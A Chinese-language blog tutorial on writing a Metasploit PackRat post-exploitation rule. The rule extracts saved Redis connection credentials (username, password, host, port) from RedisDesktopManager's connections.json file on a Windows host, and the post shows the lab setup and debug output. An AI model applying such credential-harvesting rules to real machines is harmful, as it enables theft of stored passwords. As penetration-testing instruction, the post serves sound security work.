Kali-Team

前言

两年没看过metasploit的代码了，今天在朋友圈看到电视剧《你安全吗》用到了metasploit，所以更新了一下代码，看到之前写的凭证收集的模块都替换为PackRat了。
PackRat是一个后渗透模块，从用户的系统中收集文件和信息的工具。PackRat使用regexp、JSON、XML和SQLite查询搜索和下载感兴趣的文件（如配置文件、接收和删除的电子邮件），并提取信息（如联系人、用户名和密码）。
简单来说就是把信息收集写成像nuclei那样使用规则去获取，这样就不用写代码了。

环境搭建

找了一个简单的软件作为例子，Redis的图形化客户端https://github.com/uglide/RedisDesktopManager
redis服务器搭建，连上去设置密码为：my_redis。

☁  ~  docker run -it -p 6379:6379 redis:latest
root@082845d25224:/bin# redis-cli -h 127.0.0.1 -p 6379 
127.0.0.1:6379> keys * 
(empty array)
127.0.0.1:6379> config get requirepass
1) "requirepass"
2) ""
127.0.0.1:6379> config set requirepass my_redis
OK
127.0.0.1:6379> config get requirepass
1) "requirepass"
2) "my_redis"

Untitled

配置文件：C:\\Users\\FireEye\\.rdm\\connections.json

[
    {
        "auth": "my_redis",
        "cluster_host_override": true,
        "db_scan_limit": 20,
        "host": "10.168.1.201",
        "keys_pattern": "*",
        "name": "T",
        "namespace_separator": ":",
        "port": 6379,
        "ssh_agent_path": "",
        "ssh_password": "",
        "ssh_private_key_path": "",
        "ssl_ignore_all_errors": false,
        "timeout_connect": 60000,
        "timeout_execute": 60000,
        "username": "A" //这个是我加上去测试的
    }
]

编写PackRat规则

首先ProfileDir这个是userprofile中的键，详细可以看我写的模块编写文章中的获取用户配置，调试看到就是这样的：

[1] pry(#<Msf::Modules::Post__Windows__Gather__Credentials__Rdm::MetasploitModule>)> userprofile                                                               
=> {"SID"=>"S-1-5-21-1546888072-418879536-4029880489-1001",                                                                                                    
 "ProfileDir"=>"C:\\\\Users\\\\FireEye",                                                                                                                           
 "AppData"=>"C:\\\\Users\\\\FireEye\\\\AppData\\\\Roaming",                                                                                                            
 "LocalAppData"=>"C:\\\\Users\\\\FireEye\\\\AppData\\\\Local",                                                                                                         
 "LocalSettings"=>nil,                                                                                                                                         
 "Desktop"=>"C:\\\\Users\\\\FireEye\\\\Desktop",                                                                                                                     
 "MyDocs"=>"C:\\\\Users\\\\FireEye\\\\Documents",                                                                                                                    
 "Favorites"=>"C:\\\\Users\\\\FireEye\\\\Favorites",                                                                                                                 
 "History"=>"C:\\\\Users\\\\FireEye\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\History",                                                                                 
 "Cookies"=>"C:\\\\Users\\\\FireEye\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Cookies",                                                                               
 "Temp"=>"C:\\\\Users\\\\FireEye\\\\AppData\\\\Local\\\\Temp\\x00",                                                                                                       
 "Path"=>                                                                                                                                                      
  "C:\\\\Users\\\\FireEye\\\\scoop\\\\apps\\\\openjdk\\\\current\\\\bin;C:\\\\Users\\\\FireEye\\\\scoop\\\\apps\\\\yarn\\\\current\\\\global\\\\node_modules\\\\.bin;C:\\\\Users\\\\FireEye\\\\scoop\\
\\apps\\\\yarn\\\\current\\\\Yarn\\\\bin;C:\\\\Users\\\\FireEye\\\\scoop\\\\apps\\\\nodejs\\\\current\\\\bin;C:\\\\Users\\\\FireEye\\\\scoop\\\\apps\\\\nodejs\\\\current;C:\\\\Users\\\\FireEye\\\\scoo
p\\\\apps\\\\python\\\\current\\\\Scripts;C:\\\\Users\\\\FireEye\\\\scoop\\\\apps\\\\python\\\\current;C:\\\\Users\\\\FireEye\\\\go\\\\bin;C:\\\\Users\\\\FireEye\\\\scoop\\\\apps\\\\gcc\\\\current\\\\b
in;C:\\\\Users\\\\FireEye\\\\scoop\\\\apps\\\\openssl\\\\current\\\\bin;C:\\\\Users\\\\FireEye\\\\scoop\\\\shims;C:\\\\Users\\\\FireEye\\\\AppData\\\\Roaming\\\\Python\\\\Python39\\\\Scripts;C:\\\\
Users\\\\FireEye\\\\AppData\\\\Roaming\\\\npm;C:\\\\Program Files\\\\Azure Data Studio\\\\bin\\x00",                                                                          
 "UserName"=>"FireEye",                                                                                                                                        
 "Domain"=>"WIN-79MR8QJM50N"}

所以呢可以通过这里的键快速找到用户对应的路径。

{
      application: 'redis_desktop_manager',
      app_category: 'redis',
      gatherable_artifacts: [
        {
          filetypes: 'logins',
          path: 'ProfileDir',//上面说的用户路径
          dir: '.rdm', //软件配置文件夹
          artifact_file_name: 'connections.json',//保存了密码的文件
          description: "RedisDesktopManager's saved Username and Password ",
          credential_type: 'json',
          json_search: [
            {
              json_parent: "",
              json_children: [// 要提取的键
                "['name']",
                "['username']",
                "['auth']",
                "['host']",
                "['port']",
              ]
            }
          ]
        }
      ]
    }

运行效果

Untitled

参考

https://github.com/rapid7/metasploit-framework/pull/17006